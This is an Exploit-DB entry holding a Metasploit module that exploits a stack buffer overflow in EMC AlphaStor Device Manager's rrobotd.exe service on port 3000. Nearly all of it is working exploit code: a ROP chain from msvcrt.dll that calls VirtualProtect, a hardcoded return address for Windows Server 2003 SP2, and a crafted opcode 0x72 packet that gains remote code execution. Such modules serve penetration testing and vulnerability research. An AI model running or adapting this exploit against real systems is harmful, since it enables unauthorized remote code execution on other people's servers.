EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)

EDB-ID: 42720
Author: James Fitts
Published: 2017-09-14
CVE: N/A
Type: Remote
Platform: Windows
Vulnerable App: N/A

  
 class MetasploitModule < Msf::Exploit::Remote 
 	Rank = GreatRanking 
  
 	include Msf::Exploit::Remote::Tcp 
  
 	def initialize(info = {}) 
 		super(update_info(info, 
 			'Name'           => 'EMC AlphaStor Device Manager Opcode 0x72', 
 			'Description'    => %q{ 
 				This module exploits a stack based buffer overflow vulnerability 
 				found in EMC Alphastor Device Manager. The overflow is triggered 
 				when sending a specially crafted packet to the rrobotd.exe service 
 				listening on port 3000. During the copying of strings to the stack 
 				an unbounded sprintf() function overwrites the return pointer 
 				leading to remote code execution. 
 			}, 
 			'Author'         => [ 'James Fitts' ], 
 			'License'        => MSF_LICENSE, 
 			'Version'        => '$Revision: $', 
 			'References'     => 
 				[ 
 					[ 'URL', '0day' ], 
 				], 
 			'DefaultOptions' => 
 				{ 
 					'EXITFUNC' => 'thread', 
 				}, 
 			'Privileged'     => true, 
 			'Payload'        => 
 				{ 
 					'Space' => 160, 
 					'DisableNops' => 'true', 
 					'BadChars' => "\x00\x09\x0a\x0d", 
 					'StackAdjustment' => -404, 
 					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", 
 					'Compat'	=>  
 					{ 
 						'ConnectionType'	=> '+ws2ord', 
 					} 
 				}, 
 			'Platform'       => 'win', 
 			'Targets'        => 
 				[ 
 					[  
 						'Windows Server 2003 SP2 EN',  
 							{  
 								# pop eax/ retn 
 								# msvcrt.dll 
 								'Ret' => 0x77bc5d88,  
 							}  
 					], 
 				], 
 			'DefaultTarget'  => 0, 
 			'DisclosureDate' => 'Feb 14 2013')) 
  
 		register_options( 
 			[ 
 				Opt::RPORT(3000) 
 			], self.class ) 
 	end 
  
 	def exploit 
 		connect 
  
 		# msvcrt.dll 
 		# 96 bytes 
 		rop = [ 
 			0x77bb2563,	# pop eax/ retn  
                         0x77ba1114,	# ptr to kernel32!virtualprotect 
                         0x77bbf244,	# mov eax, dword ptr [eax]/ pop ebp/ retn 
                         0xfeedface, 
                         0x77bb0c86,	# xchg eax, esi/ retn 
                         0x77bc9801,	# pop ebp/ retn 
                         0x77be2265, 
                         0x77bb2563,	# pop eax/ retn 
                         0x03C0990F, 
                         0x77bdd441,	# sub eax, 3c0940fh/ retn 
                         0x77bb48d3,	# pop eax/ retn 
                         0x77bf21e0, 
                         0x77bbf102,	# xchg eax, ebx/ add byte ptr [eax], al/ retn 
                         0x77bbfc02,	# pop ecx/ retn 
                         0x77bef001, 
                         0x77bd8c04,	# pop edi/ retn 
                         0x77bd8c05, 
                         0x77bb2563,	# pop eax/ retn 
                         0x03c0984f, 
                         0x77bdd441,	# sub eax, 3c0940fh/ retn 
                         0x77bb8285,	# xchg eax, edx/ retn 
                         0x77bb2563,	# pop eax/ retn 
                         0x90909090, 
                         0x77be6591,	# pushad/ add al, 0efh/ retn 
 		].pack("V*") 
  
 		buf = "\xcc" * 550 
 		buf[246, 4] = [target.ret].pack('V') 
 		buf[250, 4] = [0x77bf6f80].pack('V') 
 		buf[254, rop.length] = rop 
 		buf[350, payload.encoded.length] = payload.encoded 
  
 		packet = "\x72#{buf}" 
  
 		print_status("Trying target %s..." % target.name) 
  
 		sock.put(packet) 
  
 		handler 
 		disconnect 
 	end 
  
 end

Source: www.exploit-db.com